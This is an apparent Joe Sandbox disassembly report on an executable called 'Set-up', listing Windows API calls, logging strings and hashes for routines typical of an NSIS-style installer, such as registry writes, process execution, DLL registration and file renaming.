                                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                • wsprintfA.USER32 ref: 00406B4D
                                                                • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                • String ID: F$%s=%s$NUL$[Rename]
                                                                • API String ID: 565278875-1653569448
                                                                • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                APIs
                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                                • EndPaint.USER32(?,?), ref: 00401177
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                • String ID: F
                                                                • API String ID: 941294808-1304234792
                                                                • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                APIs
                                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                Strings
                                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                • API String ID: 1641139501-220328614
                                                                • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                Strings
                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                • String ID: created uninstaller: %d, "%s"
                                                                • API String ID: 3294113728-3145124454
                                                                • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                APIs
                                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                                • API String ID: 3734993849-2769509956
                                                                • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                APIs
                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                • GetSysColor.USER32(00000000), ref: 00403E00
                                                                • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                • GetSysColor.USER32(?), ref: 00403E2B
                                                                • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                • DeleteObject.GDI32(?), ref: 00403E55
                                                                • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                • String ID:
                                                                • API String ID: 2320649405-0
                                                                • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                Strings
                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                • API String ID: 1033533793-945480824
                                                                • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                APIs
                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                  • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                  • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                Strings
                                                                • Exec: command="%s", xrefs: 00402241
                                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                • Exec: success ("%s"), xrefs: 00402263
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                • API String ID: 2014279497-3433828417
                                                                • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                APIs
                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                • GetMessagePos.USER32 ref: 00404871
                                                                • ScreenToClient.USER32(?,?), ref: 00404889
                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Message$Send$ClientScreen
                                                                • String ID: f
                                                                • API String ID: 41195575-1993550816
                                                                • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                APIs
                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                • MulDiv.KERNEL32(0000E000,00000064,?), ref: 00403295
                                                                • wsprintfW.USER32 ref: 004032A5
                                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                Strings
                                                                • verifying installer: %d%%, xrefs: 0040329F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                • String ID: verifying installer: %d%%
                                                                • API String ID: 1451636040-82062127
                                                                • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                APIs
                                                                • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                • wsprintfW.USER32 ref: 00404457
                                                                • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: ItemTextlstrlenwsprintf
                                                                • String ID: %u.%u%s%s$@rD
                                                                • API String ID: 3540041739-1813061909
                                                                • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                APIs
                                                                • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
